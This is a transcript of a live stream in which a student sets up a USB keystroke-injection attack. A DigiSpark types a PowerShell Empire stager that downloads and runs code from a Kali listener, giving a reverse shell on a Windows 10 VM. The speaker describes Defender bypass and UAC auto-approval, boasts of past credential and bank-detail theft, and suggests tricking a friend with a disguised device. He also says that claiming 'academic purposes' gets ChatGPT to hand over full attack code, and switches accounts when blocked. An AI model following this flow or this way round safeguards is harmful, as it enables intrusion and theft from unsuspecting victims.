everything is lagging like a lot because I need to download a Windows 10 VM and it's gobbling up all my processing power. Uh, Everything is lagging, even like the chat server. For some reason, he did not detect my camera. Why am I frozen? What the fuck? Did the Windows thing block my... Oh, what the hell? What is happening? Good evening, Burger. Good evening, Leaf. Welcome. There we go, we're back. I think the Windows executable that's making the ISO locked my locked my camera for some reason. If this thing suddenly stops, it's because the ISO fucking killed my computer. Why is the chat is appearing? I'm dumb. Okay, what's happening? This. All right. This worked. Okay. What happened? I needed an ISO, which is an image. Where is it? Here. This is a Windows machine. I need this to make the malware work. Basically, what I need to do for this class is very simple. It's just making a malware work. Oh, by the way, everyone, we're live. It's just that, make a malware work. And my professor gave the idea of using this thing. If you watched other dev streams, you may have come across this one. I think it was one of the first dev streams I made was regarding this thing. Because, actually, there we go. Because I needed to help a guy find how to run this Empire thing. This Empire framework is a type of exploitation in Windows which allows you to open a reverse shell on the other person's computer. Here generate the PowerShell callback code with Empire framework? Do I know how to do this? No, I do not. I will learn how to do it today with you guys. Is the audio okay? Is everything okay? Just make sure. It was very hasty, everything, because it lagged a bit. Let me see. This is the code. It's very simple. Attempt to spawn an Empire agent. Vex, I'm going to message board your channel because you didn't answer my DM yesterday. Didn't I? Was it on Discord or on Twitter? Oh, thank you, Leaf. I just saw you. The last couple of days, I've shut myself off of Twitter and Discord. Today, especially of Discord. I've been very slow to answer people for some reason. Not very motivated to do anything of that for some reason. But I'll see. When the stream is over, I'll check it. Okay. Delay R, enter, launching a PowerShell Empire agent, string PowerShell, hidden not nonny, PowerShell code, spawn an Empire agent, delay, PowerShell code. Okay. README. PowerShell Empire. Sans. Post-exploitation with PowerShell Empire. Hacking with PowerShell Empire. We're cooking a malware, which I already kinda cooked, which wasn't me. Basically, a month or so ago, more probably like 2 months ago, I had to help a guy at my university getting a way to use a DigiSpark, which is this thing over here. This thing is something that you buy at AliExpress for like 50 bucks, 50 reals, so it's like $7. No, we're not. The thumbnail was wrong. I had to change it. Okay, the thumbnail was very wrong. I had to change it at the last time. Pardon me. Going back to it. This is something that I buy very cheap on AliExpress and Chinese website. It basically emulates a keyboard, and you can write code into it. The code will execute, and then, for example, if you plug this thing on your computer, I can do like a multitude of things. Like, I've already used this to get some Wi-Fi credentials. I've used this to get I was even able to get like some bank details. Not all of them, but some. Because an awful lot of things that you save on your browser, passwords, etc., even Windows stuff, again, like the Wi-Fi passwords, are all stored in a text file, in a very stupid text file that you can easily access in almost all type. Because since you're going to plug this, the computer will think it's your keyboard, so it'll have the same authorization that you have. So most people have admin access on their computer because after all, it's their computer. You're the only person using your computer. So the average person, if they plug this, I can do whatever I want because I have admin access already. Got it? Like, it's very broken. It has a layer where you need to take this thing and make it attractable for the person to plug on their computer. Right now, this thing looks like it's going to explode your computer, but if you like give it actually put it inside of an USB, add like a layer of some social engineering, you give this to your friend, say, oh, here's CS 1.6 for him, and he'll plug it in, find it weird that just a CMD popped up and then he closed, and now you have all his bank details and you can expose him for cheating on your favorite game because it was an asshole. You can do that, and it's very easy. But that's the idea. This Empire thing is this. It's PowerShell Empire. You run, from what I understand, okay, I still haven't learned much of PowerShell Empire. More like that was a very specific story. No, it wasn't. I assure you that it wasn't. It sounds interesting. It's very cool. But you need a lot of not training, but you need a lot of brain work to make it work. Okay. It is kinda just plug and play. because I have the code here and I have the tools. Basically, PowerShell Empire is a tool built into Kali Linux. Kali Linux is a Linux distro. It's a Linux that is made for defense and attack, mainly attack in cyber warfare. It has a bunch of tools pre-installed, such as PowerShell Empire, which, and I quote, "This package contains a post-exploitation framework that includes a pure PowerShell 2.0 Windows agent and a pure Python Linux OS X agent. It is the merge of the previous PowerShell Empire and Python Empire projects. The framework offers cryptologically secure communications and a flexible architecture. On the PowerShell side, Empire implements the ability to run PowerShell agents without needing PowerShell.exe, readily deployable post-exploitation modules ranging from keyloggers to Mimikatz." This Mimikatz is very potent, by the way. I should change here. Mimikatz is both an exploit of Microsoft Windows that extracts passwords stored in memory and software that performs that exploit. It's the exploit and the software. But yeah, that's the idea. It steals passwords that is stored in memory, because a lot of times when you use your password, for example, to log on your Windows, that shit is stored on your memory. Because for a long time, it, by the way, it even appeared on Mr. Robot, people thought that like putting stuff on the RAM was very. I'm looking at my computer as if you guys could see it. I'm very stupid, but if you could store stuff on the RAM, was very secure, like around like 2010, and so a lot of people did that, and it appears that it's easier to exploit the RAM than to exploit your motherboard or anything else on your computer. So there's a bunch of stuff that uses it, because there's a bunch of software that is still in 2010 or around that era. Water break. And adaptable communications to the network detection, all wrapped up with a visibility focused framework. So yeah, basically it allows you to run code on other people's computer. That's it. How will I make it work? I have no idea. That's why I have this guy here. Tell me. Let's go. How may I use DigiSpark at 1085 to exploit Windows 10 machine using PowerShell Empire. All for academic reasons. I always don't know how to spell purpose. Academic reasons. From Kali Linux. It even gave me. Okay, this one was a bitch, but this one actually helped me. Everything is lagging like a lot. I forgot to mute the page. The YouTube running the video, the stream. Step by step. Install. This one gave me steps. That's really cool. Pseudo Empire listeners. Yeah. Let me check the code here. Oh, okay. Okay. This one, it gives me like the framework, but it does not give me the PowerShell code. It gives me like the most skeleton code ever. By the way, I'll use it to ask him what should I do. Set up Empire Listener on Kali Linux attacker machine. Generate a PowerShell one-liner payload from Empire. Program your DigiSpark to type that payload when plugged in. Plug DigiSpark into Windows 10 test machine victim. Watch the victim connect back to... Okay, yeah. Basically, what we do is that we make the most easy and stupid thing ever. Two machines can converse through HTTP, SSH, a plethora of different protocols. What we do is that we make, let me bring out the good old paint. We have our machine here, the attacker machine. We and the idiot who's going to run this thing. These two are computers, okay? Computers. Clear computers with lights on them. What we do, we make a listener. This is a year, by the way. Which basically will receive connections from somewhere. He doesn't know where yet. He's just listening to a certain channel. Once the guy, our victim, plugs the thing on his computer, it's going to run the scripts needed to create a connection with our computer, which it was already listening to. So it's listening to this channel. Suddenly, a guy connects to this channel and starts sending data, and we start getting the data. And once we do that, we can send data. That's basically, this is the payload basically. This is the vector. The vector is the USB. This is the payload. It's what makes us gain access to his computer. Text. Where's text? Payload. Fref. Payload. How do I... Okay. Horrible, but you guys kind of can see it. Yeah, it's here. It's not. Frick this. Yeah. This is the payload. This is the vector. This is the vector, the USB. This makes this the guy's computer do and send data to us, and we can send data to him and friggin' kill him. That's the idea. It's pretty simple, and at least it should be simple to do it. What will I do now? I need to... It's not here. It's new. Other. How the hell do I get here? ISO. There we go. Microsoft Windows. Windows 1, 2, 3. Windows 1, 2, 3. Windows 10. Is it not enough? Um, Windows 1, 2, 3. Okay, Windows 10. Why is it warning this? It didn't explain. Okay. It's window 1, 2, 3 now. It's loading up. We'll have to install this Windows 10 machine. I should have done this before, but I arrived very late from something that I had with my family. So I'll do this now. It should take some time, but what we'll do, we'll set up stuff on Kali Linux. And I hope my computer tanks everything. I think I remember the password for the Kali machine. It should be the default one. Did I do a mistake? Okay. Kali again. What the hell? Windows cannot read the configuration product key of the answer. What the hell? I downloaded this from Windows. This is not an illegal thing. As far as I know. It should be okay, dude. What the hell? Let me kill you. Win 10. Should I just got it from Massgrave? I know Massgrave. I use another one which emulates the key generation algorithm that they use, which usually works. But I'm not going to use this because I'm pretty sure showing that on YouTube is illegal. Okay. No warnings, no issues here. Passwords change me. It's Win 10. Window 10. Install in background. Hardware. 2 cores. 5 gigs. Okay. Let's see if this will work. If this does not, I'll have to search other ways to install the freaking Windows machine, because I'm not running this thing on my computer. Well, I could. It's not that much of an issue. Partial Empire. There we go. How do they make this larger? No. view. Keyboard, tabs, help, actions, file. How do I make this closer? I remember there was a way. Frick this. View. Full screen? No. Actions. Go to File, Preferences, Kali Dark, Top, Application Transparency, Font. $25. I think that's too much. 20. Apply. 15. I think that's okay. 15. Yeah. Okay, let's check on Windows. I'll fucking kill myself. I won't download another machine. I'll do this on my own. Is it bad? Maybe I'll probably leak my household's IP, but it'll change in some hours, so it's not really a threat. Should have. It's stopping apparently. I think I set it to freeze. Yeah, I set it to freeze the instance. I'm stupid. I love it that when you ask ChatGPT and simply say that it's for academic purposes, it gives you everything. Literally everything. The code, what and how you need to do it. One second. My nose hasn't been kind the last few days. 1 second, I get some tissues. Very quick. Let's see. I prefer this answer. Setup. Example, an HTTP listener. Generate a PowerShell payload. This gives you PowerShell onliner reverse shell, something like PowerShell no PSTA. Okay. Your one-liner payload. What would be one-line payload? One-line payload. What would be some would work well in this DigiSpark script? Dun, dun, dun. Perfect, you're following a classic HID delivered privilege escalation flow. First in user context, then attempting to run as admin using UAC bypass. With start process, verb, run as. Now let's talk about Empire one-liner payloads that fit into this. Because DigiSpark's small flash size at 6 kilobytes usable code plus strings, long base 64 encoded payloads won't fit directly in a single HDID script. Instead, you want a short web-based stager that pulls the real Empire agent from your Kali web server. Common short one-liner payload HEID. What's HID? Computer. Oh, makes sense. It's the CMD. Short EIX download stager, most popular for HID. You host the full agent payload on your Kali using an Empire's built-in HTTP server or a Python HTTP server, and then only deliver a short download execute command via HID PowerShell hidden x new object.net web client download string attacker IP port launcher.ps1. Replace with your Kali, place the Empire launcher at that location. Okay. Cert util. Okay. What's cert util? It's another CMD in case PowerShell does not work. Yeah, it's risky. Recommended flow for DigiSpark due to space limit. Host a small stager launcher PS1 on Kali at port 80 or 88. inject a tiny one-liner like this. Find a script. Is a delay, string, and then enter. UAC bypass. If you really want to escalate, then Alt Y and then repeat the payload. Okay, critical lab only reminder. Okay. Fair. Just one question. This launcher PS1 that he mentioned. Stager.ps1. Where will I get this Empire launcher? From Empires. Okay. Create an Empire listener if you haven't yet. Inside Empire console, listeners use listener HTTP host your Kali IP. This starts your listener waiting for incoming agents. Okay. Generate a stager, the launch script. Now on Empire console, use stager Windows launcher, set listener HTTP generate. Empire will output something like this. Or it may also give you raw.bat or .ps. What the hell is a .ps1? Thank you. It's a PowerShell script. PS for PowerShell makes sense. Depending on the standard type you select, you can use Stager Windows Launcher PSH or BAT. Makes sense. Yeah, so I probably have to ask for this PS1 type of script. Hosting the payload so ggSpark can pull it. Save the Empire launcher output. The actual PowerShell script contents as var www.html launcher ps1 or whatever you want to host it. If you're using Apache, then yeah. Okay. Okay, let me set the listener first before we get our hands on ggSpark. Why is the Windows 10 still running? Can I kill this thing? I can. There we go. Okay. Kali. It asked me to open listeners. Listen. Great. Sudo Empire. What the hell do you mean? Oh, so it's like this? have to type PowerShell Empire every time I want to use it. Is this it? I guess it is. Positional arguments, server, client. So if I do sudo PowerShell Empire, usage empire.py age server client. That's like the most useless slash help I've ever seen. This starts your listener waiting for incoming agents. Listeners. What? Server. Loading listeners from thing. Listeners successfully started. Okay. I think this worked. I think this is like a very simple, like I already set the server, but let me ask ChatGPT. Just to be sure. Ctrl-Shift-C. When I went to start the Empire, I tried doing this, and then what's in the photo? There we go. Please explain to me. And what should I do? I think now I type listeners. No? That launched server backend, which implies communication between agents and listeners, but you're not inside the interactive Empire CLI yet. You're just running the server process. Oh, okay, it's the client that I should start. Uses declared, okay. Okay, okay. Sudo PowerShell Empire client. There we go. 408 modules currently loaded. Okay. Listeners. My listener HTTP server. Oh, I tried doing this already. Like 2 months ago, actually. Did I? Not really sure. Use stager. Not you. Use stager. It's saying here Windows launcher. I want it to use a launcher PSH. Windows launcher. There's no. Oh, does it need to be a bat? XML, VBS, SCT, LNK. I ask him again. Empire gave me these options. Which will work best with DigiSpark's low memory, small memory space? .bat launcher outputs a shorter, simpler, single-line command, often calling PowerShell internally, but without the huge base64 blob you'd get from PSH. Okay. Author Harmjoy generates a self-deleting bat launcher for Empire. Record option bypasses value manifestation ATUW. Record false, delete false. Language PowerShell. Listener. False, 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 false. Okay. Empire admin connected to socket IO. Set listener, my listener, HTTP. Did I do right? Stager launcher bat. Dude, it gave me nothing like that. Nothing. Like, I ran launcher bat and gave me just this like author and random shit. Let me show it again to him. Make it smaller so it fits on a single print. Completely different. What should I do now? That will output the actual bat stager code, something like bling. The raw PowerShell line. After generate, where you'll find the payload. If you didn't set an out file, Empire will just print the full payload on your screen. If you want to save the payload to a bat file, you can just run out file, blah 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 blah, and check. The part you care about is the PowerShell one-liner inside the bat, like bling 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 bling. After that, this thing is horrible at guiding me. Okay, generate valid ID or name. What do you mean? Invalid name or ID. Error. The listener name doesn't match exactly, or the listener wasn't properly started. Or it doesn't recognize the name. Empire expects a listener that already exists and is running. What the fuff? It is running. It's right here. Right here. This is the listener. The server. First, list your active listeners. Listeners, my listener, HTTP client server. Enable true. Look for the listener name or ID number. Name, my listener, module HTTP. If you don't have any listeners running yet, create a new one. Now go back to your stager. Oh, okay. Set listener, my listener. There we go. Or not, I don't know. Okay. Generate. Okay. Launcher bat written to this place. CD. Freq. Home. Run. Fuck this thing. CD. Okay. CD. Freq. CD. Lib. Okay. CD. Power. Shell Empire. CD Empire. Client. Generated stagers. ls. There we go. We found our file. How do we open it? Nano? Okay. Note. There we go, we have the thing. Now what? I have the payload. I have the listener. You'll take that PowerShell line, put it into the GDSpark age ID, okay, which is this thing right here. Let me see the difference. Start B PowerShell exe null y ep bypass credentials DAP download PowerShell IX. I can help you split it up into smaller chunks or use a hosted stager plus IEX. Next step for you, go ahead and run generate, then paste here the payload Empire gives you so I can help you adapt. Okay. I could do this. do it. Here it is. It's just a matter of copying and pasting it into DigiSpark now, and then testing it. Yeah, it's this bar right here. Example given. Test on a safe Windows 10 VM, never on your real machine. Cough, cough. Disable Windows Defender or add exceptions before running, otherwise PowerShell payloads will likely get blocked. Make sure your Kali server is hosting the Empire State your payload. Okay, this bar here makes me doubt if it is actually working. If hosting fails, double check that Empire's listener and staging server are reachable from the Windows target. You can extend the script to first run in user context, then open a UAC prompt. Send out Y automatically approve UAC. That's actually pretty good. UAC, by the way, is that when you want to open something as an administrator and it pops up that screen where it says, "Oh, are you sure?" If you want to, if you press Alt Y, it will accept. So since this is a keyboard, you can do that. Hi, Impering. Hello. Welcome. If you're here for coding the game, the thumbnail is wrong. I updated the thumbnail. I'm doing malware shenanigans now. Cute films. Okay. Okay. I got this thing running. PowerShell Empire server. I got in my Kali PowerShell server and client running. Only things running on it. Should I do anything else, or do they cover this? Okay. Run this from Kali curl or the target Windows VM. Even better test, okay. Open a browser and run this from your CMD. If you see PowerShell Empire payload code output, or at least 404 error, you're good. Okay. I'll run this on here just to be sure, and then my Windows. Fuck. Oh, that's so good. I think the issue is on the text. Because the file name is launcher.bat, and it's seeking for PowerShell in download. How do I change this? I'll send him a print of this. What I think is the issue is that the .bat file is not in download, nor is it called PowerShell. Should I take the launcher.bat file? No, but that doesn't make any sense. I'm trying to download Empire in the person's computer. Or am I wrong to download and change the name inside of it? If you stick with Empire's normal download, fuck them, they blocked the chat. Via normal PowerShell endpoint, if you stick. Okay, that's not the issue. That's not the issue. The issue is that apparently the server isn't running properly. That's one hell of a prompt. 1 second, I'll change the ChatGPT account so I can use it, the good model. There we go. Okay. Okay, what do I want to ask? When I try to search for when I tried searching for the server, it gave me an error. Saying that it couldn't be found. Where? What can I do? Considering the following conversation. Fuck you. I'll use Google's one. Check the Empire server process in Kali terminal. Run this to see if the server process is alive. Okay. Clear. I hate when he does this. Apparently it is. You should see output like empire.py server. Yeah, here. Python 3 empire.py client, not server. Here, server. Initiated midnight in 10 minutes. Check the listener status, most important. Now go to your Empire client terminal, the one with the Empire prompt. Run the listeners command again. Look at the output carefully. You must see your listener listed with the status of running. Oh, it changed. Fuff. Okay. Listeners enabled true. It does not say anything. As far as I know, it's using the listener. I just did not set the host, I think. which is here. Okay. It did not give me an error. It did not give me anything wrong. It's IP. What was it? IP config, IP find. I forgot. If config. Where's my IP? 192.1. Let me pair it with the other one. One, 6. Is it right? I think not. What did he do? Oh, he closed it. I closed the other one as well. No, I did not. Dude, what the fuck? This is my IP. By the way, the location is wrong, in case any of you think I doxed myself. So yeah, the host is wrong. The IP is wrong. Yeah, it should be this IP. If I get my IP. Oh, this is the gateway IP. I think that's the issue. Yeah. my IP and the VM machine is the same. That would make it hard for it to listen and talk to itself. What could I do? I'd probably need to change. If the ping fails, your machines are not on the same network or a firewall is blocking them. That's not the case. Let me ask the other ChatGPT. Considering this context, I found out that the Kali machine and my machine and the VM and the Windows 10 VM are on the same, have the same. That's the thing. How do I find out? They're different IPs. Because if I check here, not here, here, CMD, ipconfig. (11) 192.168.1.11, and if I config, I get 255 for some reason. What the hell? Ping. That's the issue. It's the broadcast. iNet 127.0.0.1. That's localhost. It'll always find it, even if I do it on my own machine. That's what I find weird. But if I try to ping my own computer on the network, it'll find it can talk to my computer. I think it cannot. Why not? What? He didn't find any. Let me ask Sir ChatGPT. It's connected to the internet. could search stuff on it. But what type of... Oh great, now VirtualBox doesn't want to work. I tried doing some testing and found out nothing. The Kali machine VM is not seeing the Windows 10 VM, but both can access the internet. I got the IP of the Win 10 VM with IP config, but when I ifconfig the Kali machine, I don't find its IP. Give me the answer in Portuguese for some reason. Yeah, he gave me the verify the type of connection of your VM. If you're using VirtualBox or VMware, see if the network mode of the Kali VM and Windows VM, they need to be in bridged adapter. Both VMs show to the net as real machines or internal network. NAT does not work. I think it is in NAT mode. And VirtualBox fucking died. I think the machine can run if I close him. No, it cannot. It's together? I'm not sure. Let me see. No, we can run without him. Yeah, that's cool. My computer is dying. It really is dying. I can't do anything. I can click anything. Fuck. Great way to end the stream, I guess. I was going to say that it was getting late, and I'd probably try doing this more tomorrow. And I don't know what to do because my computer froze. For some reason the stream is still going on, but my computer completely froze. My keyboard doesn't seem to be doing anything. My camera is still working, everything is working, it just froze. Things are running, turning, everything else seems to be working. What the hell? Wait. Is chat working? Is chat working? It is. What the hell? Everything in my computer is working fine. It's just that it's not. I guess this will be like the weirdest goodbye of any stream, My computer bricked. Yeah, it didn't. So I'll have to turn it off and close the stream later, I guess. I hope that this doesn't fucking break everything. Dude, that's so weird. I love working with stuff. Security makes me very happy. I guess that's it, guys. I can go back to the lab to make a proper goodbye statement. Well, a good statement I can still do. I hope you guys enjoyed it. It's the limit of possible. I'll try finishing it offline, probably. Try what I can do with this thing. Try different possibilities. I'll see the issue with the internet, with the IP, and see how I can finish this. I need to finish until Monday. Lovely. But yeah, I'll see you guys next week, hopefully. Have you all a lovely evening, lovely night, whatever you are. And God bless all of you. Pray for me. I'll be praying for you. And bye. I'll need to turn my computer off now. Goodbye, everyone. Bye. Can you hear it? I'm turning it off. Goodbye.